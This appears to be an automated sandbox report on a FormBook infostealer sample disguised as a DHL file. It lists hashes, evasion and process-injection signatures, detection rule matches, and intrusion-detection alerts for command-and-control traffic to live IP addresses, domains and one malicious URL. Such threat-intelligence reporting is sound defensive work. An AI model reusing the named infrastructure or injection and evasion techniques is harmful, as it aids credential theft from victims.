
Windows Analysis Report
DHL_734825510.exe

Overview

General Information

Sample name: DHL_734825510.exe
Analysis ID: 1570251
MD5: 3aae187307a535df90ed8f9faa0341d2
SHA1: c3288325246f98f3e388795f7d34d4ce4a8adb08
SHA256: 00c2d72b6a63a14fbe34e3fb19fad396213bb9be21ff695df527a676b866c8b2
Tags: DHL, exe, Formbook, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • DHL_734825510.exe (PID: 6540 cmdline: "C:\Users\user\Desktop\DHL_734825510.exe" MD5: 3AAE187307A535DF90ED8F9FAA0341D2)
    • svchost.exe (PID: 6624 cmdline: "C:\Users\user\Desktop\DHL_734825510.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • RsbLJIqaDYs.exe (PID: 64 cmdline: "C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • regini.exe (PID: 6900 cmdline: "C:\Windows\SysWOW64\regini.exe" MD5: C99C3BB423097FCF4990539FC1ED60E3)
          • RsbLJIqaDYs.exe (PID: 5356 cmdline: "C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7116 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.2661754226.00000000094A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4817215327.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4817376568.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\DHL_734825510.exe", CommandLine: "C:\Users\user\Desktop\DHL_734825510.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_734825510.exe", ParentImage: C:\Users\user\Desktop\DHL_734825510.exe, ParentProcessId: 6540, ParentProcessName: DHL_734825510.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL_734825510.exe", ProcessId: 6624, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\DHL_734825510.exe", CommandLine: "C:\Users\user\Desktop\DHL_734825510.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_734825510.exe", ParentImage: C:\Users\user\Desktop\DHL_734825510.exe, ParentProcessId: 6540, ParentProcessName: DHL_734825510.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL_734825510.exe", ProcessId: 6624, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-06T17:36:06.305032+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.12 | 49715 | 13.248.169.48 | 80 | TCP
2024-12-06T17:36:31.168424+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.12 | 49720 | 13.248.169.48 | 80 | TCP
2024-12-06T17:36:46.399948+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.12 | 49724 | 84.32.84.32 | 80 | TCP
2024-12-06T17:37:00.952886+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.12 | 49734 | 84.32.84.32 | 80 | TCP
2024-12-06T17:37:16.122569+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.12 | 49772 | 209.74.77.107 | 80 | TCP
2024-12-06T17:37:31.396749+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.12 | 49809 | 38.47.207.164 | 80 | TCP
2024-12-06T17:37:46.782408+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.12 | 49849 | 208.115.225.220 | 80 | TCP
2024-12-06T17:38:11.822163+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.12 | 49908 | 172.67.162.39 | 80 | TCP
2024-12-06T17:38:26.939013+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.12 | 49948 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:41.949933+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.12 | 49985 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:56.546963+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.12 | 50021 | 104.21.90.137 | 80 | TCP
2024-12-06T17:39:11.802745+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.12 | 50025 | 108.179.253.197 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-06T17:36:06.305032+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.12 | 49715 | 13.248.169.48 | 80 | TCP
2024-12-06T17:36:31.168424+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.12 | 49720 | 13.248.169.48 | 80 | TCP
2024-12-06T17:36:46.399948+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.12 | 49724 | 84.32.84.32 | 80 | TCP
2024-12-06T17:37:00.952886+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.12 | 49734 | 84.32.84.32 | 80 | TCP
2024-12-06T17:37:16.122569+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.12 | 49772 | 209.74.77.107 | 80 | TCP
2024-12-06T17:37:31.396749+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.12 | 49809 | 38.47.207.164 | 80 | TCP
2024-12-06T17:37:46.782408+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.12 | 49849 | 208.115.225.220 | 80 | TCP
2024-12-06T17:38:11.822163+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.12 | 49908 | 172.67.162.39 | 80 | TCP
2024-12-06T17:38:26.939013+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.12 | 49948 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:41.949933+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.12 | 49985 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:56.546963+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.12 | 50021 | 104.21.90.137 | 80 | TCP
2024-12-06T17:39:11.802745+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.12 | 50025 | 108.179.253.197 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-06T17:36:23.170513+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49717 | 13.248.169.48 | 80 | TCP
2024-12-06T17:36:25.846030+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49718 | 13.248.169.48 | 80 | TCP
2024-12-06T17:36:28.509256+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49719 | 13.248.169.48 | 80 | TCP
2024-12-06T17:36:37.927439+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49721 | 84.32.84.32 | 80 | TCP
2024-12-06T17:36:41.074454+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49722 | 84.32.84.32 | 80 | TCP
2024-12-06T17:36:43.742873+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49723 | 84.32.84.32 | 80 | TCP
2024-12-06T17:36:52.946445+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49725 | 84.32.84.32 | 80 | TCP
2024-12-06T17:36:55.615860+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49726 | 84.32.84.32 | 80 | TCP
2024-12-06T17:36:58.286505+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49728 | 84.32.84.32 | 80 | TCP
2024-12-06T17:37:08.102346+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49750 | 209.74.77.107 | 80 | TCP
2024-12-06T17:37:10.857515+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49756 | 209.74.77.107 | 80 | TCP
2024-12-06T17:37:13.493688+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49767 | 209.74.77.107 | 80 | TCP
2024-12-06T17:37:23.333261+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49789 | 38.47.207.164 | 80 | TCP
2024-12-06T17:37:26.005118+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49794 | 38.47.207.164 | 80 | TCP
2024-12-06T17:37:28.676989+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49800 | 38.47.207.164 | 80 | TCP
2024-12-06T17:37:38.720332+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49827 | 208.115.225.220 | 80 | TCP
2024-12-06T17:37:41.387774+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49833 | 208.115.225.220 | 80 | TCP
2024-12-06T17:37:44.066273+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49843 | 208.115.225.220 | 80 | TCP
2024-12-06T17:38:02.677034+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49886 | 172.67.162.39 | 80 | TCP
2024-12-06T17:38:05.348890+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49892 | 172.67.162.39 | 80 | TCP
2024-12-06T17:38:08.020986+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49898 | 172.67.162.39 | 80 | TCP
2024-12-06T17:38:18.925603+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49929 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:21.596177+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49935 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:24.271865+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49941 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:33.912697+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49964 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:36.585064+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49973 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:39.269011+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 49979 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:48.529809+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 50001 | 104.21.90.137 | 80 | TCP
2024-12-06T17:38:51.231199+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 50007 | 104.21.90.137 | 80 | TCP
2024-12-06T17:38:53.956005+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 50016 | 104.21.90.137 | 80 | TCP
2024-12-06T17:39:03.765359+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 50022 | 108.179.253.197 | 80 | TCP
2024-12-06T17:39:06.469988+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 50023 | 108.179.253.197 | 80 | TCP
2024-12-06T17:39:09.095603+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.12 | 50024 | 108.179.253.197 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-06T17:36:41.074454+0100 | 2856318 | 1 | A Network Trojan was detected | 192.168.2.12 | 49722 | 84.32.84.32 | 80 | TCP


AV Detection

Source: http://www.appsolucao.shop/8mlm/ | Avira URL Cloud: Label: malware
Source: http://www.appsolucao.shop/8mlm/?BHptZ6F=Dou+d174n903Q5s8eGVlbncTBC0Rpufru8Nex+2NzpzCLkW84PIBEnPU/VIOuudaHO13J+F+WsJAELWMIa4GeHkI0XjsMpOmPR3vOajhWYhkzVz3w31CV1o=&RZ=0nkpmZbx9Z4P2 | Avira URL Cloud: Label: malware
Source: DHL_734825510.exe | ReversingLabs: Detection: 42%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2661754226.00000000094A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4817215327.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4817376568.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4817056266.0000000005200000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2656279373.00000000065E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: DHL_734825510.exe | Joe Sandbox ML: detected
Source: DHL_734825510.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RsbLJIqaDYs.exe, 00000005.00000002.4816396248.0000000000CBE000.00000002.00000001.01000000.00000005.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4816788031.0000000000CBE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000002.00000003.2560509259.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558405419.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2655884928.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000006.00000003.2668011132.0000000002E5A000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000003.2665704256.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000002.00000003.2560509259.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558405419.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2655884928.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 00000006.00000003.2668011132.0000000002E5A000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000003.2665704256.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: regini.pdbGCTL source: svchost.exe, 00000002.00000003.2623797499.0000000003424000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2623732089.000000000341B000.00000004.00000020.00020000.00000000.sdmp, RsbLJIqaDYs.exe, 00000005.00000002.4816604781.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: regini.exe, 00000006.00000002.4819056247.000000000362C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000006.00000002.4815970575.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.0000000002D0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3062068304.00000000182BC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: regini.exe, 00000006.00000002.4819056247.000000000362C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000006.00000002.4815970575.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.0000000002D0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3062068304.00000000182BC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: regini.pdb source: svchost.exe, 00000002.00000003.2623797499.0000000003424000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2623732089.000000000341B000.00000004.00000020.00020000.00000000.sdmp, RsbLJIqaDYs.exe, 00000005.00000002.4816604781.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\regini.exe | Code function: 6_2_028CC7B0 FindFirstFileW,FindNextFileW,FindClose, | 6_2_028CC7B0
Source: C:\Windows\SysWOW64\regini.exe | Code function: 4x nop then xor eax, eax | 6_2_028B9F10
Source: C:\Windows\SysWOW64\regini.exe | Code function: 4x nop then pop edi | 6_2_028BE37A
Source: C:\Windows\SysWOW64\regini.exe | Code function: 4x nop then mov ebx, 00000004h | 6_2_02EE0525

Networking

                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49722 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.12:49722 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49728 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49726 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49719 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49725 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49718 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49717 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49715 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49715 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49756 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49734 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49720 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49734 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49772 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49772 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49750 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49767 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49720 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49723 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49789 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49724 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49724 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49721 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49794 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49800 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49809 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49809 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49833 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49827 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49843 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49849 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49849 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49886 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49892 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49898 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49908 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49908 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49941 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49929 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49948 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49948 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49935 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49964 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49973 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49979 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:50001 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:49985 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49985 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:50007 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:50023 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:50022 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:50025 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:50016 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:50025 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:50024 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.12:50021 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:50021 -> 104.21.90.137:80
                Source: DNS query: www.egldfi.xyz
                Source: DNS query: www.egyshare.xyz
